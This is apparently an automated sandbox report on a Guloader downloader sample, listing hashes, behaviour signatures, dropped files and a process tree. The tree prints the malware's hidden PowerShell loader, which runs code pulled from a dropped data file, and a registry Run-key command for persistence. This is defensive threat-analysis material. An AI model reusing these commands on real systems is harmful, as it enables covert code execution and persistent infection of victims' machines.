Overview

overview

10

Static

static

3

00db1acc41...8c.exe

windows7-x64

10

00db1acc41...8c.exe

windows10-2004-x64

10

Retshandli...29.ps1

windows7-x64

8

Retshandli...29.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    01/05/2024, 01:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe

  • Size

    391KB

  • MD5

    1e7b3c55e65b93ed3750462bd4e8d58b

  • SHA1

    abec5b9ca7157ab21fb9a5e72ef01f0a15f11a51

  • SHA256

    00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c

  • SHA512

    b75f4bc04c0ec6c0cc49c06a3290c2bfe53eabb9c530660d295d58273636c512613cf9ebd5246dcd1848f155a51f14eaa7c7dc26ce59a97721d5afecdb69ca2a

  • SSDEEP

    12288:HTg5hqq7yL3B2MWy45NDr6K8AVBQ//pR8iQXL:HTg7qdLxn45pJrVBQnnBQXL

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe
    "C:\Users\Admin\AppData\Local\Temp\00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Dimissorernes=Get-Content 'C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Retshandlingerne29.Dat';$Skoletandlges=$Dimissorernes.SubString(59193,3);.$Skoletandlges($Dimissorernes)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1392
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2440
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:2452
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Udmark% -windowstyle minimized $Boblekamre=(Get-ItemProperty -Path 'HKCU:\Halvfemsaarsfdselsdages\').Milkwood;%Udmark% ($Boblekamre)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:372
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Udmark% -windowstyle minimized $Boblekamre=(Get-ItemProperty -Path 'HKCU:\Halvfemsaarsfdselsdages\').Milkwood;%Udmark% ($Boblekamre)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:776

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      96b58cc0d155b0df26bd5069c4a8a0f1

      SHA1

      e65aef58642e8de6b68b234ec6396ced1226986f

      SHA256

      14668df554379d43dca78ffab4b1a38887654356f0fccd4d8d8ab549ac3078b2

      SHA512

      68b39be0acb59c133b02fdf549ad0d65e06acbd69c4fde4067d82c0b3e1646d8dcc0ad905dc5b03acaef74ad307c3dfbe34146c39aefab44675b24e223cebfc2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab2CFC.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar2E4A.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit

    • C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Kladdebger.Svi
      Filesize

      328KB

      MD5

      91f9880b33408373db6257b678a4a0bf

      SHA1

      912a4ec00cac46c0b15d53d539039a77137bd86e

      SHA256

      12b35dc28be02873ee8b345ac4a38eeda408aa7505a2f836aa32e3467d939008

      SHA512

      b6747b3d21b8b1e91d212863a2969f1b20b18c4686e71df6fec7d96ff05b74470cd7c063ad7fa47dca467e5e462476feb13b9ddeedfb370283b0fc11a8af454e

      Download Submit

    • C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Retshandlingerne29.Dat
      Filesize

      57KB

      MD5

      6db11b1548b28a3b9b2b3e3147cddc04

      SHA1

      7f62e36b96a2d2264a21e98b17cbb6b0710f4335

      SHA256

      af7a18872951b3eef11a71013231b42a2ef418191580cd16505cb8bd4dae8cde

      SHA512

      7e77a496ea3b44479a20a0e9edfd61fcd322ee6365cda15ab908228b936a6219e6fd3162277e46127e532dc51a95b77cf43506caa60060c426510b9721a531dd

      Download Submit

    • memory/1392-11-0x0000000002550000-0x0000000002590000-memory.dmp

      Filesize

      256KB

      Download

    • memory/1392-14-0x00000000063B0000-0x00000000074ED000-memory.dmp

      Filesize

      17.2MB

      Download

    • memory/1392-15-0x0000000073900000-0x0000000073EAB000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1392-16-0x0000000002550000-0x0000000002590000-memory.dmp

      Filesize

      256KB

      Download

    • memory/1392-18-0x0000000005120000-0x0000000005220000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1392-12-0x0000000005120000-0x0000000005220000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1392-6-0x0000000073900000-0x0000000073EAB000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1392-8-0x0000000073900000-0x0000000073EAB000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1392-7-0x0000000002550000-0x0000000002590000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2452-19-0x0000000000620000-0x0000000001682000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/2452-103-0x0000000001690000-0x00000000027CD000-memory.dmp

      Filesize

      17.2MB

      Download